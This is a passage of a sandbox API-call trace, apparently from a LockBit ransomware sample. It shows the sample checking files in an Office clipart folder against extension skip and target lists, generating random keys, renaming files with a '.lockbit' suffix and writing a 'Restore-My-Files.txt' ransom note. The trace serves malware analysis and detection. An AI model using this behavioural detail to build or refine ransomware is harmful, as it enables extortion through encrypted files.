(FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.081] malloc (_Size=0x40068) returned 0x3e70008 [0117.081] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2070) returned 1 [0117.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.082] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.083] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.083] malloc (_Size=0x9e) returned 0x2073f40 [0117.083] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9e, FileInformationClass=0xa) returned 0x0 [0117.084] free (_Block=0x2073f40) [0117.084] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.084] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.085] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x61ab7bf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRDEN_01.MID", cAlternateFileName="")) returned 1 [0117.085] lstrcmpiW (lpString1=".", lpString2="GRDEN_01.MID") returned -1 [0117.085] lstrcmpiW (lpString1="..", lpString2="GRDEN_01.MID") returned -1 [0117.085] PathFindExtensionW (pszPath="GRDEN_01.MID") returned=".MID" [0117.085] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0117.085] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.085] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0117.086] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="GRDEN_01.MID") returned 1 [0117.086] lstrcmpiW (lpString1="ntldr", lpString2="GRDEN_01.MID") returned 1 [0117.086] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="GRDEN_01.MID") returned 1 [0117.086] lstrcmpiW (lpString1="bootsect.bak", lpString2="GRDEN_01.MID") returned -1 [0117.086] lstrcmpiW (lpString1="autorun.inf", lpString2="GRDEN_01.MID") returned -1 [0117.086] lstrcmpiW (lpString1="thumbs.db", lpString2="GRDEN_01.MID") returned 1 [0117.086] lstrcmpiW (lpString1="iconcache.db", lpString2="GRDEN_01.MID") returned 1 [0117.086] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.086] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned=".MID" [0117.086] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0117.086] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0117.087] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0117.087] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0117.087] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.lockbit") returned 72 [0117.087] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.091] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.091] malloc (_Size=0x40068) returned 0x3ef0008 [0117.091] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7567) returned 1 [0117.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0117.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0117.092] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.094] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.094] malloc (_Size=0xa6) returned 0x77d7a8 [0117.094] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.095] free (_Block=0x77d7a8) [0117.095] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.095] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.095] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.095] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x52c3bfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x18bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRID_01.MID", cAlternateFileName="")) returned 1 [0117.095] lstrcmpiW (lpString1=".", lpString2="GRID_01.MID") returned -1 [0117.095] lstrcmpiW (lpString1="..", lpString2="GRID_01.MID") returned -1 [0117.095] PathFindExtensionW (pszPath="GRID_01.MID") returned=".MID" [0117.095] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0117.095] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0117.095] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0117.095] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0117.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0117.096] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0117.096] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="GRID_01.MID") returned 1 [0117.097] lstrcmpiW (lpString1="ntldr", lpString2="GRID_01.MID") returned 1 [0117.097] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="GRID_01.MID") returned 1 [0117.097] lstrcmpiW (lpString1="bootsect.bak", lpString2="GRID_01.MID") returned -1 [0117.097] lstrcmpiW (lpString1="autorun.inf", lpString2="GRID_01.MID") returned -1 [0117.097] lstrcmpiW (lpString1="thumbs.db", lpString2="GRID_01.MID") returned 1 [0117.097] lstrcmpiW (lpString1="iconcache.db", lpString2="GRID_01.MID") returned 1 [0117.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned=".MID" [0117.097] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0117.097] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0117.097] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0117.098] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0117.098] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0117.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.lockbit") returned 71 [0117.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.099] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.099] malloc (_Size=0x40068) returned 0x3db04c0 [0117.100] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=6331) returned 1 [0117.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0117.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0117.101] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.122] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.122] malloc (_Size=0xa4) returned 0x77d7a8 [0117.122] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0117.123] free (_Block=0x77d7a8) [0117.123] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.123] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.124] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636ce600, ftCreationTime.dwHighDateTime=0x1bd4b2b, ftLastAccessTime.dwLowDateTime=0x61c80c70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x636ce600, ftLastWriteTime.dwHighDateTime=0x1bd4b2b, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00057_.WMF", cAlternateFileName="")) returned 1 [0117.124] lstrcmpiW (lpString1=".", lpString2="HH00057_.WMF") returned -1 [0117.124] lstrcmpiW (lpString1="..", lpString2="HH00057_.WMF") returned -1 [0117.124] PathFindExtensionW (pszPath="HH00057_.WMF") returned=".WMF" [0117.124] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.124] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.125] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.125] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW 